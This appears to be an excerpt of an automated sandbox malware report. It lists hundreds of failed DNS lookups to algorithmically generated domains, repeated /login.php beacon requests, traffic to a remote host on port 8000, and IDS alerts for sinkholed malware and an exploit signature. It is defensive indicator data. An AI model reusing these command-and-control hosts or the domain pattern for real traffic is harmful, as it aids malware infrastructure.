    Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowykuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexynol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahydyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacynow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purylup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygysen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysysyx.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufypeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyhap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyjet.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: DNS query count 1003
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC4F80 IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02BC4F80
    Source: global trafficTCP traffic: 192.168.2.8:49730 -> 106.15.232.163:8000
    Source: global trafficDNS traffic detected: number of DNS queries: 1003
    Source: Joe Sandbox ViewIP Address: 178.162.217.107 178.162.217.107
    Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49708
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49708
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49718
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49718
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49737
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49737
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.8:58380
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.8:58380
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49740
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:60697
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
